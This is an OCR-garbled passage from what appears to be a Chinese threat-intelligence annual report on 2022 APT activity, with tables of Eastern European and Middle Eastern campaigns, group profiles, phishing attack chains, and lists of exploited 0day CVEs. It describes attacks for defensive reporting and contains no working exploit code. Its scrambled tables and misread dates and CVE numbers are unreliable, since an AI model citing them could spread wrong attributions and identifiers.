InQuest 


邮箱 : ti_support@qianxin.com ”电话 : 95015 


官网 : https://ti.qianxin.com 
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活动 描述 披露 时 间 
Gamaredon Gamaredon 继续 针对 乌克兰 进行 网 络 间 谍 活 动 2 2022-04-20 | Symantec 
UAC-0056 UAC-0056 使 用 的 Elephant 攻击 框架 分 析 1121 2022-04-25 Bitdefender 
APT29 APT29 在 网 络 钓鱼 攻击 活动 中 利用 Trello RR P^ 2022-04-28 Mandiant 
APT28 APT28 使 用 CredoMap_v2 恶意 软件 攻击 乌克兰 A 2022-05-06 CERT-UA 
Gamaredon Gamaredon 钓鱼 样本 分 析 "9 2022-05-10 =s 
APT29 在 针对 欧洲 的 攻击 活动 中 使 用 Dropbox 服务 “5 2022-05-13 DuskRise Inc 
Sandworm Sandworm 使 用 新 版 ArguePatch 攻击 乌克兰 目标 17 2022-05-20 ESET 
Turla Turla 组 织 在 东欧 实施 的 新 的 网 络 间谍 活动 P^ 2022-05-23 sekoia 
Gamaredon Gamaredon APT 近期 攻击 活动 分 析 09 2022-05-26 — ZelB 
Gamaredon APT-C-53 (Gamaredon) 新 一 轮 DDoS 攻击 任务 分 析 ° 2022-05-26 360 


APT28 利用 对 核 战争 的 恐惧 在 乌克兰 传播 Follina 漏洞 (CVE-2022- 


APT28 30190) 利用 文档 al 2022-06-13 Malwarebytes 
Gamaredon GlowSand: Gamaredon 攻击 样本 分 析 09! 2022-06-27 InQuest 
UAC-0056 UAC-0056 在 其 最 新 活动 中 继续 以 乌克兰 为 目标 “5 2022-07-13 Malwarebytes 
APT29 APT29 滥用 Slack 服务 攻击 意大利 09? 2022-07-18 FZE 
Turla,UNC1151,Callisto ”近期 东欧 的 网 络 攻击 活动 7 2022-07-19 ^ Google 
Gamaredon APT 组 织 GAMAREDON 在 近期 加 紧 对 乌克兰 的 网 络 攻势 "1 2022-07-29 #3% 
APT29 APT29 针对 Microsoft 365 的 新 策略 "5 2022-08-18 Mandiant 
Gamaredon APT 组 织 Gamaredon 针对 乌克兰 政府 开展 间谍 攻击 097 2022-09-15 Cisco 
Sandworm Sandworm 组 织 伪装 成 电信 公司 攻击 乌克兰 实体 059 D E E 
APT28 PowerPoint 中 的 鼠标 移动 事件 投递 Graphite 植 ”2022-09.23 — Cluster25 
Sandworm 疑似 Sandworm 组 织 利用 RansomBoggs 勒索 软件 攻击 乌克兰 Po 2022-11-25 ESET 
APT28 Fancy Bear 渗透 美国 卫星 网 络 中 2022-12-16 CyberScoop 
Gamaredon Gamaredon 试图 入 侵 北约 的 大 型 炼油 公司 62) 2022-12:20 PaloAlto 
Networks 


A. 表 3.13 2022 年 东欧 地 区 APT 组 织 热 点 攻击 活动 *2 
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«9» 奇 安信 威胁 情报 中 心 


中 东 地 区 的 组 织 与 行动 
Middle East 


几 个 世纪 以 来 ， 中 东 地 区 一 直 处 于 意识 形态 冲突 的 中 心 ， 由 于 动荡 不 安 的 政治 局 势 ， 中 东 地 区 的 网 络 攻 
击 活动 十 分 频繁 ， 涉 及 的 APT 组 织 众 多 ， 攻 击 目标 也 极 具 复杂 性 。 地 区 主要 强国 激烈 地 争夺 地 缘 资 本 、 
经 济 利益 和 权力 地 位 ， 使 该 地 区 充满 了 各 种 疑似 政府 背景 的 情报 监控 和 网 络 间 谍 活 动 。 奇 安信 威胁 情报 
中 心 通过 对 中 东 地 区 复杂 的 网 络 攻 击 活动 进行 长 期 追踪 和 挖掘 ， 率 先 披露 过 该 地 区 的 多 个 APT 组 织 。 


多 让 东 APT 组 织 


攻击 能 

MuddyWater 十 
APT34/ OilRig 十 十 
APT33 ++ 
FruityArmor ++ 
SandCat ++ 
黄金 鼠 ar 

N 利刃 座 + 
ERI + 
MEIS + 

E 2 
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2013 2015 


Y 


2016 


Y 


AXE 

最 早 活动 时 间 : 2012 

公开 披露 时 间 : 2013 

月 光 鼠 组 织 经 常 以 时 事 热点 制作 鱼 叉 
邮件 ， 通 过 携带 的 恶意 文档 传播 恶意 
软件 ， 此 外 该 组 织 还 会 将 恶意 软件 包 
装 在 安 卓 应 用 中 进行 传播 


APT34 

最 早 活动 时 间 : 2014 

公开 披露 时 间 : 2016 

APT34 主要 针对 中 东 地 区 实施 攻击 ， 
攻击 目标 包括 金融 、 政 府 、 能 源 、 
化 工 和 电信 等 行业 。 


人 球 高 级 持续 ! 


Y 


XX EE S5 

最 早 活 动 时 间 : 2011 

公开 披露 时 间 : 2015 

双 尾 蝎 组 织 攻击 范围 主要 为 中 东 地 
区 ， 其 针对 Windows 和 Android 双 
平台 采取 鱼 叉 或 水 坑 等 攻击 方式 配合 
社会 工程 学 手段 进行 渗透 ， 向 政府 、 
金融 、 媒 体 、 能 源 、 军 事 等 特定 目标 
人 群 进行 攻击 


性 威胁 (APT) 2022 年 度 报告 


Y 


PROMETHIUM 

最 早 活 动 时 间 : 2012 

公开 披露 时 间 : 2016 

PROMETHIUM 组 织 拥 有 复杂 的 模 
块 化 攻击 武器 库 与 丰富 的 网 络 资 
源 ， 具 备 0day 漏洞 作战 能 力 ， 拥 有 
Windows、Android 双 平 台 攻击 武器 


—ww sms. 2017 


Y 


APT33 

最 早 活动 时 间 : 2013 

公开 披露 时 间 : 2017 

APT33 是 FireEye 披露 的 APT 组 织 ， 
攻击 目标 包括 美国 、 沙 特 阿 拉 伯 和 
韩国 ， 主 要 针对 航空 和 能 源 领 域 实 
施 攻击 活动 


Y 


2018 2019 


Y 


A. 表 3.14 2022 年 中 东 地 区 活跃 APT 组 织 


APT35 

最 早 活动 时 间 : 2014 

公开 披露 时 间 : 2018 

APT35 是 FireEye 于 2018 £ 披 B 
的 APT 组 织 ， 也 被 称 为 Newscaster 
Team。 该 组 织 通常 针对 美国 和 中 东 
的 军事 、 外 交 和 政府 人 员 、 媒 体 组 织 、 
能 源 和 国防 工业 基地 (DIB) 以 及 工程 、 
商业 服务 和 电信 部 门 进行 攻击 活动 。 


Y 


Lyceum 

最 早 活 动 时 间 : 2018 

公开 披露 时 间 : 2019 

Secureworks 披露 的 一 个 针对 ICS 的 
攻击 团伙 ， 其 主要 针对 关键 基础 设施 ， 
包括 石油 和 天 然 气 以 及 可 能 的 电信 和 基 
础 设施 。 其 最 早 可 能 在 2018 年 4 月 
开始 活动 。 


MuddyWater 

最 早 活动 时 间 : 2017 

公开 披露 时 间 : 2017 

主要 针对 中 东 实施 网 络 间谍 活动 ， 也 
针对 欧洲 和 北美 国家 。 其 攻击 目标 包 
括 电 信 、 政 府 (IT 服务 ) 和 石油 部 门 。 
主要 使 用 基于 PowerShell 的 初始 阶 
段 后 门 ， 也 被 称 为 POWERSTATS 
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2022 年 1 月 12 日 ， 美 国 网 络 司令 部 在 其 官网 上 公开 发 文 披 露 MuddyWater 在 针对 全 球 的 网 络 攻击 活动 
中 使 用 了 多 个 开源 工具 ， 并 确认 MuddyWater 组 织 隶 属于 中 东 某 国家 情报 与 安全 部 (MOIS), HER 
意 软 件 分 析 服 务 平台 Virustotal 上 披露 了 MuddyWater 组 织 PowGoop 的 变种 木马 。 与 此 同时 ， 红 雨滴 
团队 通过 该 开源 情报 ， 还 原 了 整个 攻击 链 ， 并 对 PowGoop 变种 木马 进行 了 详细 分 析 。 


在 2021 年 我 们 曾 披露 过 PROMETHIUM 组 织 伪造 NotePad++ 安装 包 进 行 攻击 的 案例 。 在 此 之 后 该 组 织 
似乎 沉 息 下去， 直到 2022 年 3 月 ， 我 们 才 又 发 现 攻 击 者 换 汤 不 换 药 ， 改 为 使 用 捆绑 后 的 WinRar.exe 安 
ep E D ERU, 


Lyceum 组 织 最 早 由 Secureworks F 2019 年 公开 披露 并 命名 ， 是 一 个 很 少 被 曝光 的 组 织 ， 其 攻击 目标 
常常 是 中 东 地 区 的 石油 和 天 然 气 公司 。 我 们 对 Lyceum 组 织 的 追踪 中 发 现 其 使 用 新 的 TTP 针对 能 源 目标 ， 


了 该 组 织 的 相关 攻击 ， 通 过 诱骗 受害 者 点 击 弹 框 下 载 docm 文件 或 者 伪装 的 SCR 屏幕 保护 程序 。 


第 一 阶段 释放 器 PDF 释放 器 PDF 诱饵 文件 
E: 
加 载 
ms CED 
` ` 
后 门 C&C 服 务 器 


2| 3.15 Lyceum 组 织 攻 击 流程 


其 他 APT 组 织 如 双 尾 蝎 、 月 光 鼠 、APT34、APT35 等 依旧 是 中 东 地 区 比较 活跃 的 组 织 。 与 以 往 不 同 的 是 ， 
这 些 组 织 在 专注 于 借助 鱼 叉 钓鱼 邮件 、 水 坑 攻 击 、 社 工 等 方式 建立 攻击 立足 点 的 同时 ， 还 大 力 发 展 对 已 
知 漏洞 的 利用 能 力 。 在 2022 年 度 的 攻击 活动 中 , 常常 能 看 到 这 些 组 织 使 用 Log4 漏 洞 、 VMware RCE 漏洞、 
Exchange RCE 漏洞 等 对 攻击 目标 进行 渗透 。 结 合 公 开 情 报 ， 我 们 整理 了 2022 年 中 东 地 区 主要 攻击 活动 
如 下 表 所 示 。 
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活动 描述 


披露 时 间 


APT35 
MuddyWater 
MuddyWater 
AXE 
PXE 
MuddyWater 
APT35 

双 尾 蝎 
PXE 
AXE 
MuddyWater 
MuddyWater 
MuddyWater 
APT35 
PROMETHIUM 
APT35 

双 尾 蝎 
APT34 
Lyceum 
Lyceum 

双 尾 蝎 
MuddyWater 
Lyceum 
NÆS 
APT35 
MuddyWater 


双 尾 蝎 


APT35 利用 Log4j 漏洞 分 发 新 的 模块 化 PowerShell 工具 包 9 
MuddyWater 近期 攻击 活动 097 

继 美国 网 络 司令 部 披露 后 : MuddyWater 近期 攻击 活动 总 结 "9 

Molerats APT 针对 中 东 用 户 的 新 闻 庶 攻击 7 

与 Molerats APT 有 关 的 IP 地 址 的 分 析 069 

中 东 APT 组织 MuddyWater 通过 恶意 PDF、 可 执行 文件 针对 土耳其 用 户 D 


APT35 使 用 名 为 PowerLess 的 新 PowerShell 后 门 "^? 


AridViper APT 以 新 一 波 以 政治 为 主题 的 网 络 钓鱼 攻击 、 恶 意 软件 针对 巴 勒 
斯 坦 


Molerats 使 用 新 恶意 软件 针对 中 东 政 府 、 外 交 以 及 航空 实体 “3 

中 东 持续 活跃 的 威胁 : 月 光 鼠 组 织 借助 云 服务 展开 间 衣 攻击 了 
MuddyWater 在 网 络 间谍 活动 中 使 用 Telegram 恶意 软件 “3 

MuddyWater 针对 全 球 政府 和 商业 网 络 的 网 络 行动 “"" 

与 MuddyWater 有 关 的 子 组 织 攻击 土耳其 和 其 他 亚洲 国家 7 

APT35 使 用 ProxyShell 自动 化 初始 访问 9 

赛 博 空间 的 魔 眼 ( 续 ): PROMETHIUM 伪装 为 WinRar.exe 的 攻击 活动 分 析 
APT35 利用 VMware RCE 漏洞 安装 后 门 79 

针对 以 色 列 官员 的 APT-C-23 活动 "9? 

使 用 新 的 Saitama 后 门 针对 约旦 政府 t" 

Lyceum 组 织 针对 高 科技 芯片 行业 攻击 活动 的 简要 分 析 中 

Lyceum .NET DNS 后 门 P? 

游 走 于 中 东 的 魅影 -APT 组 织 AridViper 近期 攻击 活动 分 析 "3 
MuddyWater 组 织 持续 攻击 中 东 地 区 199 

' dE Lyceum 组 织 以 军事 热点 事件 为 诱饵 针对 中 东 地 区 的 定向 攻 
APT-C-23 ( 双 尾 蝎 ) 组 织 伪装 Threema 通讯 软件 攻击 分 析 "” 

深入 了 解 APT355 9 

新 的 MuddyWater 威胁 257 


双 尾 蝎 新 型 移动 端 恶 意 软件 揭秘 1 


A. 表 3.16 2022 年 中 东 地 区 APT 组 织 热点 攻击 活动 


2022/1/11 
2022/1/12 
2022/1/17 
2022/1/20 
2022/1/26 
2022/1/31 
2022/2/1 

2022/2/2 

2022/2/8 

2022/2/16 
2022/2/24 
2022/2/24 
2022/3/10 
2022/3/21 
2022/3/21 
2022/3/22 
2022/4/6 

2022/5/10 
2022/5/10 
2022/6/9 

2022/6/15 
2022/6/21 
2022/6/22 
2022/7/6 

2022/9/27 
2022/12/9 


2022/12/23 


checkpoint 


SentinelOne 


zscaler 
cymru 
Cisco 
cybereason 
Cisco 
proofpoint 
微 步 在 线 
Mandiant 
CISA 

Cisco 


DFIR report 


Morphisec 
cybereason 


Malwarebytes 


360 
Avertium 


Deep Instinct 
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其 他 地 区 的 组 织 与 行动 
Other Areas in the World 


2022 年 全 球 安全 厂商 披露 出 多 个 具有 高 级 攻击 技术 、 并 在 本 年 度 持续 活跃 的 APT 组 织 ， 以 及 以 经 济 为 
目的 的 网 络 犯罪 组 织 Hive0117 和 网 络 军火 商 KNOTWEED， 奇 安信 威胁 情报 中 心 整理 上 述 组 织 的 相关 简 
介 ， 如 下 表 所 示 。 


最 早 活动 时 间 公开 披露 时 间 


该 攻击 组 织 最 早 的 攻击 活动 可 以 追溯 到 2021 年 12 月 。 主 要 针对 欧 


To adis OUS 洲 金融 和 投资 实体 目标 等 进行 攻击 活动 na。 


该 攻击 组 织 最 早 的 攻击 活动 可 以 追溯 到 2022 年 。 疑 似 来 自 地 中 海 
POLONIUM 2022 2022 东 岸 ， 主 要 针对 以 色 列 的 关键 制造 业 、 信 息 技 术 、 交 通 系 统 、 国 防 
工业 基地 、 政 府 机 构 和 服务 目标 等 进行 攻击 活动 P991, 


该 攻击 组 织 最 早 的 攻击 活动 可 以 追溯 到 2021 年 4 月。 来 源 未 知 ， 
主要 针对 土耳其 ， 北 塞浦路斯 的 高 校 、 研 究 所 和 军队 目标 等 进行 攻 
击 活动 。 其 使 用 NiceRender 生成 的 恶意 文档 投递 LetMeOut 木马 


[24] 


MURENSHARK 2021 2022 


通过 PDF 文 诱饵 文档 和 网 站 对 金融 、 政 府 组 织 进行 网 络 钓鱼 ， 主 要 
Kasablanka 2021 2021 进行 信息 收集 和 间谍 活动 ， 其 具备 Windows 和 Android 平台 的 恶 
意 攻击 能 力 O 


疑似 来 自 东欧 地 区 的 出 于 经 济 动机 的 网 络 犯 罪 组 织 ， 主 要 针对 立 陶 


Be s 4 宛 、 爱 沙 尼 亚 和 俄罗斯 电信 、 电 子 和 工业 部 门 的 用 户 1, 
KNOTWEED 2021 2022 来 自 欧洲 某国 的 网 络 军火 商 , 善于 利用 Oday 进行 网 络 攻 击 活动 。 
TA2541 是 一 个 网 络 犯罪 组 织 ， 主 要 针对 航空 、 航 天 、 运 输 和 国防 
TA2541 2017 2022 等 行业 ， 攻 击 目标 集中 在 北美 、 欧 洲 和 和 中东， 诱饵 消息 几乎 都 是 英 
文 的 。 
疑似 中 东 地 区 的 APT 组 织 ， 主 要 进行 信息 窃取 和 间谍 活动 ， 其 攻击 
E ed erue Us denial 
Cunning Kitten — 2021 2022 目标 聚焦 于 世界 各 地 的 使 用 波斯 语 的 相关 人 士 。 鱼 叉 式 邮件 钓鱼 是 


Cunning Kitten 主要 攻击 方式 ， 并 且 Cunning Kitten 有 能 力 跟 进发 
布 的 最 新 漏洞 PoC， 将 其 用 于 攻击 。 


A. 表 3.17 2022 年 其 他 地 区 活跃 APT 组 织 *1 
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最 早 活动 时 间 公开 披露 时 间 


该 攻击 组 织 疑似 来 自 中 东 ， 主 要 针对 以 色 列 的 航运 、 政 府 、 能 
UNC3890 2020 2022 源 和 医疗 保健 目标 等 进行 攻击 活动 。 其 攻击 后 投递 SUGARUSH/ 
SUGARUSH 后 门 。 


疑似 来 自 中 东 地 区 的 APT 组 织 ， 主 要 针对 亚洲 、 非 洲 的 政府 、 能 
worok 2020 2022 源 目标 等 进行 攻击 活动 。 其 攻击 后 投递 CLRLoad/PowHeartBeat/ 
PNGLoad 三 种 类 型 的 攻击 样本 。 


主要 针对 中 东 ， 非 洲 的 电信 、 互 联网 服务 提供 商 和 大 学 目标 等 进行 


Mercor aozi aa 攻击 活动 。 其 攻击 后 投递 metaMain/Mafalda 攻击 样本 。 
疑似 来 自 东 亚 地 区 ， 主 要 发 布 虚假 工作 机 会 ， 并 通过 whatsapp 和 
UNC4034 2022 2022 受害 者 联系 后 诱骗 其 下 载 恶 意 ISO 镜像 。 其 攻击 后 投递 AIRDRY < 
=. 
来 源 未 知 ， 主 要 针对 乌克兰 政府 进行 攻击 钓鱼 活动 。 投 递 恶意 
UNC4166 2022 2022 的 Windows 安装 1S0， 并 最 终 下 载 木马 STOWAWAY, BEACON, 
SPAREPART。 
— ET dn 来 源 未 知 ， 主 要 针对 菲律宾 、 束 埔 寨 、 越 南 地 区 的 军事 、 财 政 部 门 


等 目标 进行 攻击 活动 。 其 攻击 后 投递 PowerDism 攻击 样本 。 


A. 表 3.17 2022 年 其 他 地 区 活跃 APT 组 织 *2 


TA4563 组 织 主要 攻击 目标 是 欧洲 金融 和 投资 实体 ,尤其 是 那些 支持 外 汇 、 加 密 货 币 和 去 中 心 化 金融 (DeFi) 
业务 的 实体 ， 攻 击 特 点 是 利用 Ink 加 载 器 、javascript 和 Powershell 脚本 释放 EvilNum 后 门 组 件 ， 用 
来 窃取 数据 或 加 载 后 续 攻 击 载荷 231, 


KNOTWEED 是 来 自 欧 洲 某国 的 网 络 军火 商 ， 主 要 针对 欧洲 、 中 美洲 目标 等 进行 攻击 活动 。 曾 在 2021 年 
通过 Adobe 0day CVE-2021-28550 及 Windows 提 权 0day CVE-2021-31199 和 CVE-2021-31201 进行 
攻击 。 在 2022 年 通过 CVE-2022-22047 提 权 0day 进行 攻击 ， 之 后 投递 恶意 软件 Subzero"?", 


Kasablanka 通过 网 站 钓鱼 传播 Android 平台 间谍 软件 SpyNoteRAT， 钓 鱼网 站 伪装 成 也 门 联合 国 儿 童 
基金 会 网 站 ， 声 称 提供 移动 端 应 用 程序 以 进行 载荷 投递 ， 攻 击 样本 存放 在 钓鱼 网 站 中 。 该 钓鱼 网 站 从 
2021 年 7 月 开始 投入 使 用 ， 至 2022 年 仍然 活跃 +。 
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=Z) MediaFire SIGNUP LOGIN f W 


Something appears to 


be missing... 


The key you provided for file access was invalid. This is usually 
caused because the file is no longer stored on MediaFire. This 
occurs when the file is removed by the originating user or 
MediaFire. 


会 HOMEPAGE @ SUPPORT Ü MOBILE APPS 


A. 图 3.18 Kasablanka 组 织 钓 鱼 页 面 


该 组 织 恶 意 Android 应 用 图 标的 伪装 对 象 除 了 上 面 提 到 的 也 门 联合 国 儿 童 基金 会 ， 还 包括 联合 国 、 联 合 
国 儿 童 基金 会 供应 司 、 通 话 软 件 等 。 根 据 对 软件 图 标 伪装 对 象 的 分 析 ， 受 害 者 应 该 是 也 门 的 政治 团体 或 


公益 组 织 。 


A. 图 3.19 Kasablanka 组 织 恶意 Android 应 用 的 图 标 
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2022 年 7 月 ，Mandiant 发 现 了 一 种 新 型 鱼 叉 式 网 络 钓鱼 方法 ， 该 方法 被 攻击 组 织 UNC4034 使 用 。 攻 
击 者 传播 PuTTY SSH fü Telnet 客户 端的 恶意 版 本 。 攻击 链 始 于 发 送 给 受害 者 虚假 工作 机 会 的 电子 邮件 ， 
随后 UNC4034 通过 WhatsApp 与 受害 者 建立 通信 ， 接 着 诱骗 受害 者 下 载 伪装 成 虚假 工作 内 容 的 恶意 
ISO 映像 199, 


ES. 


Contact Established Job Assessment Victim attempts to 
with Victim ISO Archive connect to assessment 
with backdoored PuTTY 


A 


Backdoor communication PuTTY launches Themida- 
established with C2 servers packed DLL on connection 


AIRDRY.V2 DAVESHELL shellcode 
Backdoor Deployed loaded in memory 


到 3.20 UNC4034 组 织 新 型 钓鱼 攻击 流程 


» 
D 


Witchetty 组 织 在 2022 年 2 月 27 日 至 3 月 18 日 期 间 利用 ProxyShell 漏洞 攻击 了 中 东 政 府 机 构 ， 窍 取 
Exchange 服务 器 的 账号 密码 ， 之 后 在 5 月 至 8 月 进行 内 网 横向 移动 ， 从 C2 服务 器 上 下 载 插件 执行 ， 并 
以 系统 用 户 身份 每 天 执行 LookBack 后 门 9。 


2022 £ 5 B, UNC4166 在 toloka[.]to Ukrainian Torrent Tracker ( 乌克兰 语 和 俄语 洪流 文件 共享 平 
台 分 发 ) 上 托管 了 Windows 10 ISO 木马 镜像 ， 这 次 ISO 供应 链 攻 击 袭 击 了 乌克兰 政府 ， 被 感染 的 几 
台 设 备 在 2022 年 7 月 中 旬 设 置 计 划 任 务 ， 通 过 PowerShell 执行 命令 。 攻 击 者 还 部 署 了 Stowaway、 
Beacon 和 Sparepart 后 门 ， 以 保持 对 受 感染 计算 机 的 访问 、 执 行 命令 、 传 输 文件 、 窃 取 和 凭据 和 键盘 记 
RE, 
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lsomaker 


3 nawu x 110522 
Boctaers: 30.05.22 
Piongownem. 6 
(no3a wepeseso) 


O anaana: 2022-05-20 15:27 


MS Windows 10 21H92 64bit Ukrainian 6e3 rezeMerpii 


» 
网 


组 织 名 
Hive0117 
Cunning Kitten Cunn 
TA4563 
KNOTWEED 
Kasablanka 
UNC3890 
MURENSHARK 
UNC4034 
Metador 


Witchetty 


UNC4166 


3.21 Windows 10 ISO 木马 镜像 托管 页 画 


疑似 中 东 APT 组 织 针 对 以 色 列 航运 、 


Witchetty 组 织 使 用 更 新 的 工 


活动 描述 


利用 钓鱼 邮件 攻击 立陶宛 的 国有 通信 公司 、 爱 沙 尼 亚 的 知名 工业 
企业 以 及 位 于 俄罗斯 的 多 家 电子 和 电信 企业 "™ 


ing Kitten- 针对 中 东 相 关 人 士 的 威胁 组 织 099 


以 欧洲 金融 和 投资 实体 为 诱饵 邮件 ， 利 用 OneDrive 下 发 
EvilNum 后 门 组 件 P^! 


通过 CVE-2022-22047 提 权 0day 进行 攻击 ， 之 后 投递 恶意 软件 
Subzero! 


190] 


利用 钓鱼 网 站 等 针对 也 门 政治 团体 或 公益 组 织 进行 攻击 "1 


医疗 保健 、 政 府 和 能 源 部 门 


以 土耳其 为 特定 目标 进行 钓鱼 攻击 "3 


通过 WhatsApp 进行 的 工作 机 会 网 络 钓鱼 


Metador Zi - 隐藏 在 电信 公司 、ISP 和 大 学 中 的 未 归 因 威胁 中 


集 攻击 中 东 政 府 "9 


针对 乌克兰 政府 的 木马 化 Windows 10 操作 系统 安装 程序 097 


A. 表 3.222022 年 其 它 地 


邮箱 : ti_support@qianxin.com 


区 APT 组 织 热 点 攻击 活动 


电话 : 95015 BW: https://ti.qianxin.com 


披露 时 间 


2022-04-26 


2022-06-24 


2022-07-21 


2022-07-27 


2022-08-17 


2022-08-17 


2022-08-18 


2022-09-14 


2022-09-22 


2022-09-29 


2022-12-15 


披露 机 构 


Securitylntelligence 


[ud] 


ze 


l 


Proofpoint 


Microsoft 


360 


Mandiant 


绿 盟 


Mandiant 


SentinelLabs 


Symantec 


Mandiant 
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第 四 章 大 量 0day 漏 洞 被 用 于 APT 攻 击 


相 较 于 2021 年 0day 漏洞 井喷 似 爆发 ，2022 年 0day 漏洞 的 使 用 整体 趋 于 缓和 ， 比 之 2021 年 有 大 幅 下 
降 ， 但 同比 2020 年 却 有 所 上 升 。 当 将 2021 年 这 个 特殊 年 份 去掉 ， 可 以 发 现 Oday 在 野 漏洞 的 攻击 依然 
维持 一 个 逐年 递增 的 趋势 。 


EF 0day 漏洞 的 平台 分 布 呈 三 足 易 立 的 趋势 ， (IX. GA. SER, 作为 当今 三 个 最 大 的 软件 平台 提供 商 ， 
其 产品 的 在 野 0day 占 全 年 所 有 在 野 0day 攻击 数量 近 9 成 ， 谷 歌 、 微 软 相 关 产 品 的 0day 都 多 达 11 个 。 
其 中 谷歌 浏览 器 作为 全 球 使 用 量 最 大 的 浏览 器 ， 其 在 野 0day 多 达 9 个 。 微 软 方面 由 于 放弃 了 自 研发 济 
览 器 , 在 野 0day 大 多 为 Windows 操作 系统 中 的 提 权 漏洞 , 其 中 部 分 和 Chrome 浏览 器 的 攻击 有 所 关联 ， 
此 外 微软 Exchange Server 仍然 是 攻击 者 内 网 穿梭 的 首选 目标 。 最 后 苹果 作为 一 个 相对 独立 的 生态 ， 其 
在 野 漏 洞 数 量 在 微软 、 谷 歌 之 下 ， 以 操作 系统 本 身 的 提 权 漏 润 及 浏览 器 端 漏洞 为 主 。 


此 外 值得 注意 的 是 ，2022 年 出 现 的 在 野 0day 中 多 个 皆 因 之 前 的 漏洞 没有 完全 修复 或 机 制 类 似 而 产生 ， 
这 里 感谢 谷歌 的 Project Zero 总 结 的 相关 漏洞 。 


Windows win32k CVE-2022-21882 CVE-2021-1732 (2021 itw) 


iOS IDMobileFrameBuffer CVE-2022-2258 CVE-2021-30983 (2021 itw) 


Chromium property access CVE-2016-5128 CVE-2021- 
interceptors 30 (2021 itw) CVE-2022- 
Addresses incomplete 

-2022-1096 fix) 


WebkKit CVE-2( Bug was originally fixed in 
2013, patch was regressed in 
Google Pixel CVE-2021-39793* Linux same bug in a different 
subsystem 
* While this CVE says 2021, the bug 
was patched and disclosed in 2022 


Atlassian Confluence CVE-2022-26134 CVE-2021-26084 


Windows CVE-2022-26925 ("PetitPotam") | CVE-2021-36942 (Patch 
regressed) 


A. El 4.1 Google Project Zero 对 2022 上 半年 相似 漏洞 的 总 结对 比 数据 


Project Zero 的 总 结 数据 持续 到 2022 年 上 半年 ， 这 里 我 们 对 下 半年 类 似 的 漏洞 进行 补充 。 厂 商 理 解 自 
己 产 品 中 漏洞 的 利用 并 进行 最 完整 的 修缮 成 为 漏洞 处 理 流程 后 期 的 一 大 难题 ， 同 时 如 何 根据 已 知 漏洞 进 
行 更 大 范围 的 漏洞 狩猎 也 对 安全 研究 人 员 提 出 了 更 多 的 要 求 。 


65 全 球 高 级 持续 PT) 2022 年 度 报告 


Product 
Jscript9 
Exchange 


Exchange 


A 表 4.2 2022 下 半年 相似 漏洞 总 结对 比 数据 


2022 年 在 野 攻击 的 重要 漏洞 如 下 所 示 : 


漏洞 编号 


影响 厂商 


2022 ITW 0-day 
CVE-2022-41128 
CVE-2022-41040 


CVE-2022-41080 
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CVE-2021-34480 
CVE-2021-34473 


CVE-2021-34473 


CVE-2022-21882 
CVE-2022-22587 
CVE-2022-22620 
CVE-2022-0609 
CVE-2022-26485 
CVE-2022-26486 
N/A 
CVE-2021-22600 
CVE-2021-39793 
CVE-2022-1040 
CVE-2022-1096 
CVE-2022-22674 
CVE-2022-22615 
CVE-2022-26871 
CVE-2022-24521 
CVE-2022-1364 
CVE-2022-26925 
CVE-2022-30190 
CVE-2022-26134 


CVE-2022-2294 


Microsoft 
Apple 
Apple 
Google 
Mozilla 
Mozilla 
RIRES 
Google 
Google 
Sophos 
Google 
Apple 
Apple 
Trend Micro 
Microsoft 
Google 
Microsoft 
Microsoft 
Atlassian 


Google 


A 表 4.3 2022 在 野 重 点 0day 漏洞 *1 


HE Ai. 利用 的 APT 组 织 
是 未 知 

否 未 知 

是 未 知 

E Lazarus 

S DarkHotel 

E DarkHotel 

8 未 知 

否 未 知 

是 Driftingcloud 
否 未 知 

否 未 知 

A 未 知 

否 未 知 

A 未 知 

否 未 知 

否 未 知 

是 未 知 

是 Driftingcloud 
是 Candiru 


未 知 


Google's Threat Analysis 
Group 


360 


360 


未 知 


Trend Micro Research 


National Security Agency 
and Crowdstrike 


Google's Threat Analysis 
Group 


Bertelsmann Printing 
Group 


Shadow Chaser Group 
Volexity 


Avast Threat Intelligence 
team 


邮箱 : ti support(qianxin.com 
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利用 代码 / 细 


漏洞 编号 影响 厂商 节 是 否 公开 利用 的 APT 组 织 


Microsoft Threat 


= d Intelligence Center / 
CVE-2022-22047 Microsoft 否 未 知 Microsoft Security 
Response Center 
CVE-2022-2856 Google 否 未 知 Misa Threat Analysis 
roup 
CVE-2022-32894 Apple 否 未 知 ES 
CVE-2022-32893 Apple 8 未 知 未 知 
CVE-2022-3075 Google 否 未 知 未 知 
CVE-2022-32917 Apple 否 未 知 未 知 
CVE-2022-41033 Microsoft 否 未 知 未 知 
CVE-2022-42827 Apple 否 未 知 未 知 
CVE-2022-3723 Google 否 未 知 Avast 
: = » Trend Micro Zero Day 
CVE-2022-41040 Microsoft 是 未 知 Initiative 
= : Trend Micro Zero Day 
CVE-2022-41082 Microsoft 是 未 知 Tiere 
CVE-2022-41128 Microsoft 是 APT37 Pers s Threat Analysis 
roup 
3 2 " Microsoft Threat 
CVE-2022-41073 Microsoft 否 未 知 Intelligence Center 
Microsoft Threat 
= n Intelligence Center / 
CVE-2022-41125 Microsoft 否 未 知 Microsoft Security 
Response Center 
CVE-2022-4135 Google 否 未 知 CE S seat yal 
roup 
CVE-2022-42856 Apple = 未 知 e s Threat Analysis 
roup 
CVE-2022-4262 Google = 未 知 o e sunak 
roup 
- = Trend Micro Zero Day 
CVE-2022-41082 Microsoft AE Initiative 


全 Xx 4.3 2022 在 野 重 点 Oday 漏洞 “2 


一 、 善 用 浏览 器 0day 漏洞 的 东北 亚 地 区 APT 团伙 


2021 年 初 ，APT 团伙 Lazarus 发 起 了 针对 安全 人 员 的 攻击 事件 ， 攻 击 中 使 用 了 多 个 浏览 器 及 本 地 提 
权 漏 洞 。2022 年 初 该 团伙 又 针对 美国 的 新 闻 、IT、 Wn a 攻击 中 使 用 了 
Chrome 浏览 器 的 Oday 漏洞 CVE-2022-0609， 结 合 Chrome 浏览 器 的 利用 特性 ， 这 一 波 攻 击 中 至 少 还 
有 一 个 用 于 提 权 的 未 知 0day 漏洞 。 据 Google 研究 人 员 的 分 析 ，Exp 落地 前 还 进行 了 Macos/Firefox 相 
关 的 环境 检测 ， 有 理由 相信 ， 该 组 织 手中 应 该 还 有 针对 Safari/Firefox 的 0day 漏洞 。 同 时 ， 攻 击 者 似乎 
吸取 了 2021 攻击 时 的 经 验 教训 ， 对 投递 的 Oday 利用 进行 多 重 保护 ， 包 括 不 限于 : 
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1. 漏洞 跳 转 的 iframe 只 在 特定 的 时 间 提 供 

2. 鱼 叉 邮件 中 的 链接 包含 唯一 ID， 以 确保 一 个 漏洞 利用 的 链接 只 有 一 次 触发 机 会 
3. 漏洞 利用 的 每 一 个 阶段 都 通过 AES 加 密 

